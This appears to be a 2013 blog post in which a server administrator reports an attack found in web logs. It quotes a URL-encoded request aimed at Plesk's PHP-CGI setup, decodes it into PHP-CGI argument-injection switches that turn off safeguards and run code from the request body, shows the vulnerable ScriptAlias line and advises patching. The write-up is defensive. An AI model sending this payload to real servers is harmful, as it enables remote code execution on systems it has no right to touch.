Home > Technical Miscellany > Apache/Plesk php Exploit

Apache/Plesk php Exploit

August 7, 2013 Leave a comment Go to comments

While reviewing web server logs recently, I spotted the following attack…

216.237.113.27 – – [07/Aug/2013:08:12:14 -0400] “POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1”
404 209 “-” “-”

Which decodes to:

/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions=”” -d
open_basedir=none -d auto_prepend_file=php://input -n

Googling turned up a few relevant results suggesting this is an attack on Plesk, a commercial web hosting automation program. Parallels, the company who owns Plesk, published a knowledge base article on the vulnerability describing how to determine if a deployment is vulnerable and how to patch the system.

One aspect of a vulnerable deployment includes an Apache configuration utilizing the following ScriptAlias configuration:

ScriptAlias /phppath/ “/usr/bin/”

For those running Plesk or others with the above configuration, it is recommended that your system be patched accordingly. Check the references below for more detailed information regarding this vulnerability.

References

Disclaimer

This blog is posted for informational purposes only. Extensive testing is recommended prior to implementing changes discussed here.

Categories: Technical Miscellany
  1. No comments yet.
  1. No trackbacks yet.

Leave a comment